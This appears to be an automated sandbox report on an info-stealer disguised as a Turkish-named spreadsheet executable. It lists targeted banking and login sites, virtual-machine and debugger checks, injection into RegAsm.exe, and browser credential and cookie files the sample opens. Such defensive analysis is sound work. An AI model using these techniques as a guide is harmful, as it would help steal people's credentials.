                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: Amcache.hve.7.drBinary or memory string: VMware
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: RegAsm.exe, 00000003.00000002.4018020786.0000000001291000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfi
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                  Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000040C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: RegAsm.exe, 00000003.00000002.4021377725.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ---.csReference to suspicious API methods: FindResource(moduleHandle, _320D_31CF_A9BF_321A_3208_322D_31DE_31EE, _3221_320F_3223)
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 446000Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F12008Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeQueries volume information: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4019025145.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
